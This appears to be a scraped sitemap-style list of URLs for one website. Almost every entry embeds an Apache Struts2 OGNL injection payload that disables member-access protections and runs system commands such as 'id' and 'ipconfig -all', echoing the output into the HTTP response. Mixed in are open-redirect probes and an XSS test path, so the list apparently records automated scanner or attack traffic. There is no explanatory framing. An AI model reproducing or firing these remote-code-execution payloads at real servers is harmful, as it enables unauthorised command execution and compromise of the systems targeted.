http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ns9l8 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ns9l8? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=6em7n 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 